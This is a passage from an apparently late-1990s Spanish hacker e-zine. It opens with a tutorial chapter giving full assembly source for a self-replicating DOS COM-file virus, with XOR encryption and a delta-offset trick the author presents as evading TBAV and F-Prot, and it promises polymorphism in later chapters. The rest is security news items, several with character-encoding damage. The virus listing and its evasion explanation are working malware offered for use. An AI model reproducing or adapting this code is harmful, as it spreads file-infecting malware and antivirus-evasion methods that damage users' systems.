responsabilidad civil y/o legal que discurra > de la utilización fraudulenta de esta información. El responsable único > y último ser el lector si decide usarla para dichos fines. El autor: Manuel Llorens. ****************************************************************************** En los siguientes capítulos vamos a ir mejorando el virus del capítulo segundo hasta que sea indetectable por los actuales antivirus. Para ello comenzamos con una encriptación simple. Esto evitar que los antivirus puedan encontrar cadenas comunes entre dos versiones distintas del virus. De momento las rutinas de encriptación permanecen sin encriptar y son simpre idénticas por lo que aún existe una posiblidad de identificación de cadenas. En posteriores capítulos introduciremos polimorfismo completo. Dado lo relativamente complejo de la encriptación (ya que lia bastante el código) prefiero llegar sólo hasta el punto alcanzado por este virus en este capitulo: === ASM Begin 'v021.asm'=== ; El presente listado es un virus de 285 bytes. Es capaz de infectar ; COMs que se encuentren en el directorio en el que se ejecuta. Buscar ; hasta encontrar un COM apropiado. No reinfecta. La marca de infección ; es 0fe0h a partir del tercer byte. No infectar los archivos protegidos ; contra escritura. Preserva la fecha y la hora del archivo original. ; Est encriptado con clave variable, según el host. ; Para ensamblar: TASM virus, TLINK /t virus ; Patuel virLENGTH equ offset virEND-offset virBEGIN encLENGTH equ offset encEND-offset encBEGIN C_SEG segment 'CODE' org 100h assume cs:C_SEG,ds:C_SEG,es:C_SEG host: jmp entry ; Saltamos al código vírico db 0fh,0e0h clave: db 0 virBEGIN label byte entry: call near ptr start start: call near ptr getbp ; Con esto evitamos al TBAV add sp,2 ; Dejamos bien la pila mov al,buffer+bp+5 call encrypt ; Desencriptamos encBEGIN label byte mov di,100h ; Principio del host push di ; Dejamos 100h en la pila lea si,buffer+bp movsw ; Ahorramos bytes al no cargar CX movsw movsw mov ah,1ah ; Establecer DTA en DS:DX lea dx,virEND+bp int 21h mov ah,4eh ; Buscar primer archivo que coincida lea dx,path+bp ; con la cadena en DS:DX xor cx,cx ; Sólo archivos normales busqueda: int 21h ; (no infectar los write protected) jc salir ; salir si hubo error call infect ; infectamos el archivo salir: mov ax,cs mov ds,ax mov es,ax mov ah,1ah ; Establecer DTA en DS:DX mov dx,80h int 21h ret otro: mov ah,3eh ; Cerrar el handle en BX int 21h mov ah,4fh ; Buscar siguiente archivo jmp busqueda fecha: mov ax,5701h ; Establecer fecha y hora de BX mov cx,word ptr [virEND+bp+16h] mov dx,word ptr [virEND+bp+18h] int 21h ret infect: mov ax,3d02h ; Abrir fichero en DS:DX el lec/esc ; En el offset 1eh de la DTA est ; el nombre del archivo lea dx,virEND+bp+1eh int 21h jc salir ; salir si hubo error xchg bx,ax ; metemos en BX el handle mov ah,3fh ; Leer CX bytes desde BX hasta DS:DX mov cx,6 lea dx,buffer+bp ; Los metemos en el buffer int 21h cmp word ptr buffer+bp+3,0e00fh je otro cmp byte ptr buffer+bp+5,00h jne sigue inc byte ptr buffer+bp+5 sigue: mov ax,4202h ; Mover el puntero la cantidad CX:DX mov cx,0ffffh ; desde el final del archivo mov dx,-2 int 21h mov ax,4201h ; Mover el puntero la cantidad CX:DX xor cx,cx ; desde la posición actual xor dx,dx int 21h ; Nos devuelve en DX:AX la longitud or dx,dx ; El COM es demasiado grande jne otro cmp ax,0ffffh-VirLENGTH jnb otro cmp ax,10h ; El COM es demasiado pequeño jb otro sub ax,3 ; Longitud menos salto inicial mov word ptr long+bp,ax call encrypt2 ; Encriptamos/copiamos/desencriptamos mov ax,4200h ; Mover el puntero la cantidad CX:DX xor cx,cx ; desde el comienzo del archivo xor dx,dx int 21h mov ah,40h ; Escribir CX bytes desde DS:DX a BX mov cx,5 lea dx,salto+bp ; Reconstrucción del salto int 21h call fecha mov ah,3eh ; Cerrar el handle en BX int 21h ret path db '*.COM',0 salto db 0e9h long dw ? marca db 0fh,0e0h encEND label byte buffer db 0cdh,20h,90h,?,?,0 copy: mov ah,40h ; Escribir CX bytes desde DS:DX a BX mov cx,VirLENGTH lea dx,VirBEGIN+bp ; Desde el comienzo del virus int 21h ret encrypt2: mov al,buffer+bp+5 ; La clave de encriptación call encrypt ; Encriptamos call copy ; Copiamos mov al,buffer+bp+5 ; Desencriptamos call encrypt ret encrypt: lea si,encBEGIN+bp ; El encriptador/desenc. mov cx,encLENGTH bucle: mov ah,byte ptr [si] xor ah,al mov byte ptr [si],ah inc si loop bucle ret getbp: mov bp,sp ; Para calcular el δ-offset mov bp,word ptr [bp+2] sub bp,offset start ret virEND label byte C_SEG ends end host === ASM End 'v021.asm'=== Los cambios que he hecho consisten en separar la rutina de infección y llamarla con un call y mover la clave de infección (que sigue siendo la misma) hasta el 3 byte del archivo. Adem s he cambiado la forma de calcular el δ-offset para que ni el TBAV ni el F-Prot puedan seguir la pista a la encriptación ;) No creo que teng is problema en seguir estos cambios, dado que adem s no afectan a la encriptación. Estudiemos como se produce la encriptación: La encriptación que vamos a realizar es un XOR simple usando una clave variable. Para los que no lo sep is hacer un XOR tiene la inestimable ventaja de que la misma rutina con la que encriptamos nos sirve para desencriptar, o sea, que la encriptación de la encriptación es la desencriptacíon %DDDDDDDDDDDDDD No podemos encriptar todo el código vírico, dejaremos fuera alguna rutinas. El comienzo del virus (necesitamos calcular el δ-offset antes de desencriptar), la propia rutina de encriptación y la rutina que copia el virus al final del host. El esquema del virus, una vez que ha infectado su primer host (no en el falso host) es el siguiente: Comienzo C lculo del δ-offset Desencriptado Ejecución Encriptado Copiado al host Desencriptado final Como véis primero se desencripta (estoy hablando siempre del virus en memoria claro) de modo que el verdadero código vírico pueda ejecutarse. Pero llegado el punto en el que debe copiarse tiene que volver a encriptarse (con una nueva clave), ya que necesitamos que se copie encriptado. Pero como luego tiene que continuar ejecut ndose el código lo volvemos a desencriptar. La clave que usaremos para encriptar/desencriptar el virus es el el primer byte no modificado del host (offset 6 desde el comienzo del virus) Es una forma de obtener un número 'aleatorio', aunque ser siempre el mismo al infectar el mismo archivo. Para usar este valor lo que hacemos es copiar al buffer los 6 primeros bytes del virus (3 del salto, 2 de la marca de infección y el 'aleatorio'). Esta vez el buffer lo dejamos fuera de la parte encriptada, ya que necesitamos ese valor para desencriptar ;) Debemos saber que si hacemos un XOR con el valor 0 no encriptamos nada, así que antes de aceptar un valor como clave lo comparamos con 0 y si lo es lo ponemos en 1. Pero el valor 0 nos va a ser muy importante, ya que es justo la clave que necesitamos para encriptar el falso host de modo que esté encriptado pero esté igual que sin encriptar. Por ello como podemos ver en el listado el valor de la clave (valor buffer+bp+5) es 0. Pues creo que eso es todo. Como podéis comprobar con una simple encriptación y unos cambios en la forma de calcular el δ-offset ni TBAV ni F-Prot (ni ningún otro) son capaces de detectar el virus. El F-Prot algunas veces (según el host) si dice algo, pero el TBAV nada de nada. Aún así seguiremos mejorando el virus hasta que ningún antivirus, ni scanner ni residente sea capaz de detectarlo. Entonces veremos cómo podemos hacer un antivirus definitivo. De momento cualquier antivirus residente lo pillar , y el TBAV aún es capaz de extraer cadenas para localizarlo. Esta vez he ido mucho m s r pido, el listado est menos comentado y he detallado la explicación mucho menos, así preguntaréis m s! ;))) Miraros bien el listado hasta comprender cómo va la encriptación porque es algo complicadilla. Existen otras soluciones pero esta es la m s sencilla, en el próximo capítulo aún m s mejoras ;) Patuel ;) ((((((((((((((ZeD-wOrLd-EzInE numero 5))))))))))))))))))))))))))))))))))))))))))))))))))))))))) NoTiCiAs ---------- Las opniones aqui reflejadas por los autores de las noticias no son mias,por lo tanto puedo o no apoyar lo que se refleja en estas lineas. *********************************************************************************************** Acceso a Internet via satelite a 6Mbps La californiana Hughes Communications (http://www.spaceway.com) anuncia una nueva forma de acceder a Internet via satelite. Basta con disponer de una antena parabolica de 66 cm de diametro, un adaptador especial conectado al PC, y listo, comunicacion bidireccional hacia y desde la Red -lo habitual es recibir via satelite y enviar via linea telefonica- a velocidades de hasta 6Mbps (unas 180 veces mas que un modem de 33.600). El sistema utiliza una veintena de satelites no geoestacionarios para realizar los enlaces y opera en la banda K (de 17,7 a 30 GHz). La unica pega es que este nuevo sistema no entrara en funcionamiento hasta el 2002. Mas informacion en http://www.spaceway.com/new/press/service.html *********************************************************************************************** MICROSOFT IMPLEMENTARIA EL PAGO DE UNA MATRICULA PARA EL USO DEL WINDOWS Un memorandum interno de Microsoft dado a conocer el viernes en el marco del juicio que el Departamento de Justicia de los Estados Unidos esta llevando adelante contra el gigante del software, demuestra que la empresa de Bill Gates esta considerando cobrarle una matrmcula anual a los usuarios de PC por el uso del sistema operativo Windows, a partir del 2001. En un memo enviado en diciembre de 1997 al propio Bill Gates, el vicepresidente de ventas para los fabricantes de PC de la compaqma, Joachim Kempin, fue quien sugiris que los usuarios de PC comenzaran a pagar una especia de matrmcula para poder utilizar el popular OS. Actualmente se abona un importe en tal concepto, pero es znico y esta incluido en el precio final de venta de las computadoras. De todas maneras, de prosperar la iniciativa no podrma ser puesta en marcha hasta el 2001, ya que Microsoft necesitarma desarrollar una gran infraestructura a nivel mundial para poder cobrar las matrmculas. Consultado con respecto al memo, el vocero de Microsoft Mark Murray, coments que "no se trata de una opcisn de licencia que esta cerca de convertirse en realidad, sslo es una simple idea que se esta evaluando". http://www.news.com/News/Item/0,4,29088,00.html?st.ne.160.head *********************************************************************************************** __________________________________________________________________ INTRUSOS PENETRAN EN EL SISTEMA DE CORREO DE LA UNIVERSIDAD DE STANFORD __________________________________________________________________ Se ha sabido que el mes pasado, fueron robadas las contrase±as de mßs de 4.500 estudiantes y profesores de la Universidad de Stanford (California, USA). Al parecer, los intrusos permanecieron unas tres semanas dentro del sistema sin ser detectados. Portavoces de Stanford informaron de que los atacantes actuaron desde Canadß y Suecia, y de que sus fines iban mßs allß del acceso a las cuentas de correo. Stephen Hanson (responsable de la seguridad informßtica del centro), afirm≤ no saber si la cuenta de correo de Chelsea Clinton (hija del presidente Clinton) estaba entre las afectadas, si bien apunt≤ a que Chelsea dispone de varias medidas de seguridad adicionales en su cuenta privada. La prestigiosa Universidad de Stanford acababa de instalar nuevas medidas de seguridad en su red informßtica, pero tal modificaci≤n fue mal realizada en algunos ordenadores, circunstancia que los intrusos aprovecharon en su ataque. ******************************************************************************** __________________________________________________________________ Nuevo agujero de seguridad en Netscape? __________________________________________________________________ Georgi Guninsky (http://www.geocities.com/ResearchTriangle/1711/), otro infatigable descubridor de agujeros de seguridad en los navegadores, como nuestro Cuartango, ha anunciado la semana pasada en Bugtraq que ha descubierto una nueva vulnerabilidad en Netscape Communicator. Este fallo permite leer ficheros del ordenador de un usuario que visite una pßgina Web que incluya c≤digo malicioso capaz de explotar la vulnerabilidad. La gravedad que reviste el fallo es a·n mayor si cabe, en la medida en que no es necesario conocer la ruta de acceso del fichero, como ocurrφa con los agujeros de Cuartango, ya que este fallo en Communicator permite examinar directorios. Posteriormente, los contenidos del fichero recuperado podrφan ser enviados a un host arbitrario, donde podrφan ser procesados con fines malvados. La condici≤n necesaria para que funcione este fallo es que se tenga activado Java y Javascript. Soluci≤n ======== Hasta que Netscape publique un parche, la ·nica forma de protecci≤n consiste en desactivar Java o Javascript, en Edici≤n-->Preferencias-->Avanzadas. Demostraciones ============== Pßgina de demostraci≤n del propio Guninsky en: http://www.geocities.com/ResearchTriangle/1711/b6.html Para los escΘpticos y los incrΘdulos, existen unas pßginas espectaculares que demuestran la eficacia de este agujero en: http://www.kics.bc.ca/~trev/cgi-bin/test.html (para usuarios de Windows) http://www.kics.bc.ca/~trev/cgi-bin/test-unix.html (para usuarios de Unix) *********************************************************************************************** __________________________________________________________________ CIBER-VANDALISMO EN NUEVA ZELANDA: 4.500 SITIOS WEB BORRADOS DEL MAPA __________________________________________________________________ Ihug -proveedor de Internet radicado en Auckland, Nueva Zelanda- comunic≤ que 4.500 sitios web a los que prestaba alojamiento mediante un servidor localizado en California, fueron literalmente eliminados por un intruso, en el ataque de mayor envergadura conocido en ese paφs hasta la fecha. Al parecer, el atacante entr≤ en el sistema gracias a un agujero de seguridad en un script CGI, lo que le permiti≤ da±ar ficheros y directorios a su antojo, hasta afectar a mßs de 4.500 de los 12.000 sitios web albergados. La compa±φa reconoci≤ la inexistencia de copias adecuadas de seguridad, por lo que es de prever que bastantes usuarios particulares (que disfrutaban de 5 MB de espacio gratuito cada uno) habrßn perdido sus datos para siempre. TambiΘn resultaron afectadas mßs de 500 firmas comerciales. La empresa manifest≤ conocer ya la identidad del intruso, y estar considerando las acciones legales oportunas. Nueva Zelanda carece de legislaci≤n especφfica para las intrusiones electr≤nicas, aunque pudiera ser de aplicaci≤n un caso britßnico similar acontecido en 1991, siempre que lograra acreditarse la voluntad de causar da±o. *********************************************************************************************** La semana pasada se reunφan en Viena representantes de los 33 paφses que suscribieron el acuerdo Wassenaar, por el que -desde hace tiempo- se limita la exportaci≤n de material criptogrßfico hacia terceros paφses. Diversas organizaciones defensoras de los ciberderechos habφan reclamado que se aprovechase esta reuni≤n para retirar de una vez las restricciones existentes en la actualidad. Dado que este gesto supondrφa en la prßctica la desaparici≤n de un acuerdo que hunde sus raφces en la Guerra Frφa, razones de coherencia hist≤rica pudieran sustentar un cierto grado de optimismo de cara a la abolici≤n del acuerdo Wassenaar, lo que hubiera supuesto un fuerte varapalo a las prßcticas restrictivas del otro lado del Atlßntico. Pero este no fue el caso: los firmantes del acuerdo se reafirmaron en seguir sustentando su plena vigencia e incluso incluyeron en el mismo saco a productos que hasta ahora estaban exentos, debido a su amplia difusi≤n, siempre que utilicen claves de mßs de 64 bits (caso de PGP, sin ir mßs lejos). Un grave paso atrßs... Los funcionarios norteamericanos no podφan ocultar su satisfacci≤n, y no tardaron en convertir esta victoria en una especie de refrendo internacional a su polφtica contra la libre exportaci≤n de criptografφa. De forma casi inmediata, la agencia Reuters difundi≤ la noticia a los cuatro vientos, siendo reflejada rßpidamente en los principales medios informativos de la Web: http://www.crypto.com/reuters/show.cgi?article=912708583 http://www.msnbc.com/news/220434.asp http://www.wired.com/news/news/email/explode-infobeat/politics/story/166 23.html El acuerdo Wassenaar "s≤lo" afecta a la exportaci≤n de estos productos a terceros paφses no firmantes del acuerdo, y a los que por motivos polφticos o geo-estratΘgicos, se considera susceptibles de realizar un uso inadecuado de estas tecnologφas. Ahora corresponde a cada paφs miembro, elaborar medidas concretas para materializar ese acuerdo. Recordemos que Espa±a ya regul≤ este tema no hace demasiado y cualquier cambio al respecto generarφa sin duda una importante oposici≤n. No obstante, no se trata precisamente de una buena noticia. Sin tardar, los dep≤sitos de software criptogrßfico de muchos paφses podrφan verse abocados a impedir la descarga de estos programas a personas de otras necionalidades, al estilo de lo que nos viene ocurriendo a los no norteamericanos si intentamos descargar este material desde los Estados Unidos. Por otro lado, habrß que arbitrar penas contra quienes exporten, permitan (o incluso no impidan) la exportaci≤n de estos programas a seg·n quΘ paφses. Las empresas productoras de software verßn limitada su competitividad en el extranjero, tal como les viene ocurriendo a las empresas norteamericanas. A·n mßs: ┐seguirß siendo libre la publicaci≤n de documentos criptogrßficos en la web En fin, que la noticia no es como para celebrarla. Las primeras reacciones de los cibernautas no se han hecho esperar y comienza a haber llamadas para hacer acopio de este tipo de herramientas y establecer 'mirrors' por todos lados. La idea es buena para el material ya existente, pero el problema seguirß afectando de lleno a los programas que puedan elaborarse en el futuro. Otra iniciativa curiosa es la emprendida por la empresa canadiense Zero-Knowledge Systems Inc. Acaban de poner en marcha una pßgina web desde la que pueden enviarse e-mail y faxes de protesta a miembros de los gobiernos de los paφses firmantes del acuerdo de Viena: http://www.freecrypto.org/act/ TambiΘn comienza a haber llamadas desde otros medios a huelgas de cibernautas "a la espa±ola", etc, etc... - ---------- Lo peor es que (con ser grave lo anterior) podrφa tener ademßs el efecto colateral de distraer a la opini≤n p·blica de un asunto a·n mßs preocupante si cabe: la inminente actualizaci≤n de la llamada Resoluci≤n para la Interceptaci≤n Legal de las Telecomunicaciones, que el Consejo de Ministros Europeos pudo tratar, a puerta cerrada, ayer jueves. Al parecer, una filtraci≤n desde el Parlamento Europeo habla de la inminente puesta en marcha de un sistema de monitorizaci≤n de Internet y de las redes Iridium, GlobalStar, Odissey e ICO de telefonφa celular vφa satΘlite, que permitirφa a la policφa acceder a todas estas comunicaciones -y esto es lo mßs grave- SIN NECESIDAD DE PREVIA AUTORIZACI╙N JUDICIAL. Seg·n la supuesta filtraci≤n, el FBI estarφa colaborando en la implantaci≤n transnacional de un nuevo y sofisticado sistema de escuchas. El asunto estß desencadenando el malestar de algunos eurodiputados (como Patricia McKenna, del Partido Verde IrlandΘs), que critican el secretismo que habrφa rodeado la puesta en marcha de este plan y reclaman la apertura de un amplio debate social, dada las implicaciones de este tema para el derecho de los ciudadanos a la privacidad. Ir≤nicamente, John Pike, analista de seguridad de la Federaci≤n Americana de Cientφficos, ve con buenos ojos la participaci≤n del FBI en el proyecto de espiar a los ciudadanos europeos, pero considerarφa intolerable que los europeos pudieran acceder a las comunicaciones privadas de ciudadanos norteamericanos. Este sφ es un asunto preocupante y de la mßxima gravedad. Para los que se pierdan entre los vericuetos de la burocracia de Bruselas, baste decir que un proyecto de tantφsima importancia pudiera aprobarse y resultar vinculante sin siquiera requerir la aprobaci≤n del parlamento europeo. Consideramos INDISPENSABLE la lectura del artφculo completo de Wired en: http://www.wired.com/news/news/email/explode-infobeat/politics/story/165 88.html - -------- La ofensiva parece bien planificada. Por un lado, se legalizan las escuchas; por otro, se dificulta el acceso a las herramientas de protecci≤n de la privacidad. Y dicen que lo peor estß por venir. Este invierno se presenta caliente. *********************************************************************************************** El protocolo de seguridad PGP se convertirß en estßndar El protocolo de seguridad OpenPGP ha pasado la prueba de fuego al conseguir el visto bueno de IETF (Internet Engineering Task Force) para convertirse en propuesta de estßndar. Aunque PGP es ampliamente conocido en todo el mundo y no existen grandes diferencias tΘcnicas de implementaci≤n, su conversi≤n en norma garantizarß un mayor nivel de interoperatividad. OpenPGP es la versi≤n como estßndar abierto del protocolo de cifrado PGP (Pretty Good Privacy) de Network Associates. Aunque se le considera un rival de la norma S/MIME (Secure Multipurpose Mail Extensions) , basada en tecnologφa de RSA Data Security, en Network Associates piensan que lo mßs probable es que ambas opciones coexistan. La siguiente fase que deberß pasar PGP es la definici≤n de un borrador de estßndar, proceso que llevarß al menos seis meses durante los cuales se realizarßn diversas pruebas de interoperatividad entre las soluciones existentes. Sin embargo, se espera que PGP pueda alcanzar rßpidamente ese estado, debido a su ya larga presencia en el mercado, concretamente ocho a±os, y al elevado n·mero de implementaciones disponibles. http://www.idg.es/comunicaciones/detalle.asp?Secc=Tendencias&IdA=60979&Nro=1 29 *********************************************************************************************** ------------------------------------------------ 30 hackers podrman doblegar a EEUU Mas de 20 naciones ya han penetrado con ixito los servicios informaticos de Estados Unidos, introduciendo asm una nueva amenaza, znica y potencialmente devastadora. Lo anterior se desprende de un informe elaborado por el Centro de Estudios Estratigicos e Internacionales (CSIS, por sus iniciales en inglis), y que lleva el tmtulo "CyberCrime, CyberTerrorism and CyberWarfare: Averting an Electronic Waterloo". En el informe se seqala que elementos terroristas internacionales podrman desestabilizar e incluso destruir sociedades - incluyendo la estadounidense- mediante el uso de redes informaticas, sistemas de comunicacisn y bancos de datos. En un pasaje del documento se escribe que "en el actual entorno electrsnico, muchos elementos hostiles podrman atacar a una de las naciones electrsnicamente mas vulnerables del mundo". Luego, se seqala que "los adversarios de EEUU saben que el verdadero patrimonio del pams esta almacenado electrsnicamente. Las corporaciones virtuales, las transacciones electrsnicas y las econommas sin inventarios - basadas en entregas de zltima hora- harman que los ataques contra la informacisn electrsnica sean igual de destructivos que los ataques sobre inventarios fmsicos". En el informe se observa ademas que "los bytes, y no las balas, son la nueva municisn. O, mas dramaticamente, una combinacisn de bytes, balas y bombas". Luego se indica que "el terrorista internacional mas buscado por EEUU", Osama bin Laden - responsabilizado por ese pams de los recientes atentados dinamiteros contra dos de sus embajadas- se vale de las comunicaciones fuertemente cifradas con enlace satelital realizadas desde computadoras portatiles al momento de dialogar con su red clandestina de asociados. Posteriormente, se hace mencisn a que en Internet no faltan "recetas terroristas, ademas de gumas paso a paso para hackers y ciberterroristas". En uno de los pasajes mas relevantes del documento se seqala que los especialistas del Pentagono sobre guerra informatica han calculado que EEUU podrma ser doblegado por un ataque bien preparado y bien coordinado, realizado por 30 expertos ubicados estratigicamente en diversos lugares del mundo. Segzn el informe, tal ataque tendrma un costo de menos de USD 10 millones, lo que convertirma en la forma mas barata de dejar fuera de combate a la mayor potencia del mundo. (DTI) Mayor informacisn en http://www.csis.org/ *********************************************************************************************** Programa extrae IE de Windows 98 Ecologista e investigador estadounidense logrs lo que Microsoft calificaba de imposible: eliminar Internet Explorer del sistema operativo Windows 98. El investigador y programador Shane Brooks, adscrito a la Universidad de Maryland, EEUU, cres un programa que bautizs 98Lite, que con sus sslo 212 Kb tiene la funcionalidad necesaria para separar Windows 98 de Internet Explorer. En su pagina web, Brooks presenta el programa escribiendo "porque decman que no era posible". Luego, precisa que Windows es un producto excelente que, lamentablemente, esta recargado con elementos que il, como usuario de una computadora relativamente dibil, considera innecesarios. De igual modo, destaca que Windows 98 tiene muchas caractermsticas positivas que le hacen mucho mas estable y confiable que su predecesor, Windows 95. El investigador recalca que 98Lite no infringe las disposiciones establecidas en la licencia para uso de Windows 98, agregando que sus "modestos cambios" al sistema operativo no eximen al usuario de su obligacisn de respetar las clausulas de la licencia. (DTI) Microsoft http://www.microsoft.com Mayor informacisn en: http://www.wam.umd.edu/~ssbrooks/98lite/index.html *********************************************************************************************** En una reciente feria de muetras (Comdex), Bill Gates compar≤ la industria informßtica cn la industrai del autom≤vil y realiz≤ las siguientes afirmaciones: "... si General Motors (GM) hubiera evolucianado su tecnologφa de la misma forma que la industria de la informßtica, todos conduciriamos ahora coches que costarφan 25 dolares y recorrerφan 1000 km, con un solo litro de gasolina..........." Como respuesta convoc≤ GM (el propio MR. Welch) una rueda de prensa con el siguiente contenido: Si General Motors hubiese desarrollado una tecnologφa como la de Microsoft conduciriamos actualmente coches con las siguientes caracterφsticas: 1.- Su auto tendrφa sin motivo conocido dos accidentes por dφa. 2.- Cada vez que se pintasen de nuevo las lφneas de la carretera, se deberφa comprar un coche nuevo. 3.- En ocasiones el coche se detendrφa en la autopista sin motivo conocido y deberφa aceptarse sin mal humor , arracar el coche de nuevo y continuar la marcha. 4.- Cuando se realizara una maniobra "especial", por ejemplo, una curva a la izquierda, el coche se detendrφa, y no se podrφa arrancar de nuevo. Se deberφa instalar un nuevo motor. 5.- Solo se podrφa sentar una persona por coche, a no ser que se comprara Car98 o CarNT. En este caso se deberφa pagar por cada asiento por separado. 6.- Macintosh contruirφa automoviles que funcionarφan con energφa solar, serφan mßs fiables, serφan dos veces mßs rßpidos y cinco veces mßs fßciles de conducir, pero solo tendrφan un 5% del mercado. 7.- Las luces de control de aceite, y las lßmparas de aviso para temperatura y baterφa. se sustituirφan por una lßmpara de aviso que dirφa "Fallo General del Coche" 8.- Nuevos asientos exigirßn que todos los ocupantes tuvieran el mismo tama±o de culo. 9.- El sistema de airbag preguntarφa ┐Estß ud seguro? antes de actuar. 10. En ocasiones el coche quedarφa cerrado sin ninguna raz≤n aparente. Solo podrφa abrirse mediante el truco de simultaneamente tirar de la puerta, girar la llave y con la otra mano sujetar la antena de la radio. 11.- GM le forzarφa a comprar con cada coche un accesorio de lujo de la firma Rand McNally (filian de GM), incluso sino lo deseara o necesitara. Si no acepta esta opci≤n, su coche circularφa un 50% mßs lento, a consecuencia de ello GM serφa objeto de una investigaci≤n de la justicia. 12.- Siempre que GM presentara un nuevo coche, deberßn tgodos los conductores aprender a conducir de nuevo, ya que ninguno de los mandos funcionaria como el de los modelos anteriores. 13.- Se deberφa pulsar el boton de arranque si quisiera apagar el motor. A estas afirmaciones, todavφa se esta a la espera de la respuesta de Bill Gates, o de cualquier representante de Microsoft. Sin comentarios. *********************************************************************************************** Agujero del IIS ôGETö Microsoft ha publicado un parche que soluciona una vulnerabilidad en su Internet Information Server 3.0 y 4.0 que podrφa permitir ataques de denegaci≤n de servicio contra sus servidores Web. Esta vulnerabilidad estß relacionada con el mΘtodo GET del protocolo HTTP, usado para recuperar informaci≤n de un servidor Web. El problema estriba en que una petici≤n GET especialmente confeccionada puede crear una situaci≤n de denegaci≤n de servicio que consuma todos los recursos del servidor, ôcolgßndoloö (o dejßndolo fuera de servicio). Hay casos en que el servidor se puede volver a poner en funcionamiento parando y rearrancando el IIS, mientras que en ocasiones es necesario reinicializar la mßquina. N≤tese que esta vulnerabilidad no afecta a los datos albergados en el servidor ni permite usurpar privilegios, causando exclusivamente la caφda temporal del servidor. Parches: - Para IIS 3.0 en X86: ftp://ftp.microsoft.com/bussys/iis/iis-public /fixes/usa/security/Infget-fix/infget3i.exe - Para IIS 4.0 en X86: ftp://ftp.microsoft.com/bussys/iis/iis-public /fixes/usa/security/Infget-fix/infget4i.exe - Para IIS 3.0 en Alpha: ftp://ftp.microsoft.com/bussys/iis/iis-public /fixes/usa/security/Infget-fix/infget3a.exe - Para IIS 4.0 en Alpha: ftp://ftp.microsoft.com/bussys/iis/iis-public /fixes/usa/security/Infget-fix/infget4a.exe (Nota: los URLs han sido deliberadamente partidos en dos lφneas cada uno) Para mßs informaci≤n: - Boletφn de seguridad de Microsoft 98-019, http://www.microsoft.com/security/bulletins/ms98-019.asp. *********************************************************************************************** China condena a muerte a dos hackers por robar a un banco http://cnn.com/WORLD/asiapcf/9812/28/BC-CHINA-HACKERS.reut/ PARA LOS ESPA╤OLES El teniente anselmo del moral se ha idoo sif sif ahora ahy uno nuevo, mirar sus declaraciones.. son de risa :o) Para Θl, los "hackers" son -arruga la nariz- "filosofφa anglosajona, es todo muy peliculero" y no duda en afirmar que "hay que estar loco para estar 24 horas ante el ordenador", aunque cree que la mayorφa de delicuentes de la red "son mßs pillos que tΘcnicos". ┐Su direcci≤n preferida? "La pßgina de la Guardia Civil". ┐Aunque la tumben los æhackersÆ? "Del servidor, no nos encargamos nosotros sino otro departamento", sonrφe. *********************************************************************************************** >UN PROGRAMA CATAL┴N CAUSA EL P┴NICO EN ISRAEL > >MercΦ Molist >"QueSO" es la contracci≤n de "┐QuΘ Sistema Operativo?" y un inteligente programa creado por Jordi Murg≤, miembro del selecto club de "gur·s" informßticos, "Els Ap≥stols". QueSO envφa peque±os paquetes incorrectos de datos a una mßquina y, a partir de los paquetes que Θsta devuelve como respuesta, es posible conocer su sistema operativo. >Esta herramienta, usada por auditores de seguridad de todo el mundo y ßmpliamente probada en muchos equipos, es tambiΘn la base del "Internet Operating System Counter", una estadφstica mensual sobre mßs de 940.000 ordenadores europeos conectados a la red, para dirimir cual es el sistema operativo mßs implantado en el continente (Linux gana por mayorφa). >Los problemas para este sondeo y su promotor, Hans Zoebelein, afincado en Alemania, llegaron a principios de noviembre: una empresa de Israel, donde tambiΘn se hace la estadφstica, ya que este paφs entra dentro del RIPE (RΘseaux IP EuropΘens), le acus≤ de haber intentado un ataque contra sus mßquinas. Zoebelein se afan≤ en explicar que lo que parecφa un "port scanning" (escaneo de puertos, usado por los "hackers" para saber si hay alguno vulnerable) no era mßs que el inocente "QueSO" en acci≤n. Pero ya era tarde. >24 horas despuΘs, dos empresas de seguridad, Comsec y Publicom, lanzaban la alarma, asegurando que centenares de mßquinas israelianas, incluyendo bancos, lugares militares y compa±φas de alta tecnologφa, habφan sido escaneadas para ser "hackeadas", que los piratas habφan traspasado incluso un cortafuegos de la reputada marca Checkpoint y que el ataque, "intenso y de alto nivel", provenφa de un ordenador llamado leb.net, sito en Estados Unidos y mantenido por "hackers" libaneses. >Rßpidamente, los peri≤dicos del paφs se hicieron eco de la noticia, con titulares como "Un libanΘs residente en Estados Unidos ataca lugares israelφes en Internet" o "Un terrorista alemßn y la guerrilla libanesa, contra la Inteligencia Israeliana". La ·nica verdad en todo el embrollo era que, efectivamente, el sondeo se realiza desde el servidor de Texas leb.net, concretamente y para mßs "inri" desde la mßquina beirut.leb.net. >Pasado el temporal, Zoebelein ha parado su estadφstica mensual, "de momento", seg·n dice: "Lo hacφa por diversi≤n pero, ahora, no tengo ganas ni de mirar el c≤digo de los archivos que ya habφa recogido". Por su parte, Jordi Murg≤, el autor del "QueSO", asegura que Θste es "totalmente inofensivo" y que es imposible que haya conseguido traspasar un cortafuegos: "Es todo mentira, nunca habφa tenido una pega, hasta ahora. No pienso cambiar nada del programa porque es todo una paranoia; las empresas de seguridad israelianas debφan necesitar publicidad y por eso hicieron que cundiese el pßnico". > >The Internet Operating System Counter. Http://www.hzo.cubenet.de/ioscount >QueSO >http://www.apostols.org/projectz/queso > *********************************************************************************************** * 22 de Diciembre: El ingeniero espa±ol Juan Carlos Garcφa Cuartango comunica el nacimiento del "Nieto del Agujero de Cuartango", que pone en evidencia la fragilidad del segundo parche elaborado por Microsoft para este persistente fallo: http://pages.whowhere.com/computers/cuartangojc/gson2.html * 23 de Diciembre: Microsoft anuncia la publicaci≤n de un nuevo parche para el denominado "Frame Spoof", nueva debilidad que permite a un sitio web malintencionado hacer aparecer un marco ('frame') falso en el navegador de sus visitantes cuando visiten una pßgina que contenga 'frames' autΘnticos. El atacante pide a los usuarios cualquier tipo de informaci≤n a travΘs del 'frame' falso (que el usuario cree pertenece al sitio legφtimo), y Θsta es enviada de vuelta al impostor. TambiΘn opera vφa e-mail y el navegador de Netscape (y posiblemente otros) es tan susceptible como -al menos hasta ahora- el de Microsoft. Descubridores del fallo, con pßgina de demostraci≤n: http://www.securexpert.com/framespoof/ La informaci≤n oficial de Microsoft estß disponible en: http://www.microsoft.com/security/bulletins/ms98-020.asp Parches para Explorer: http://www.microsoft.com/windows/ie/security/spoof.asp Microsoft anuncia que este parche soluciona tambiΘn el "Nieto del Agujero de Cuartango", y emplaza a los usuarios a instalarlo cuanto antes. Como dato curioso, el comunicado oficial de Microsoft agradece expresamente a Cuartango su continuada colaboraci≤n en la detecci≤n y soluci≤n de estos problemas. *********************************************************************************************** Los servicios secretos alemanes espian 700 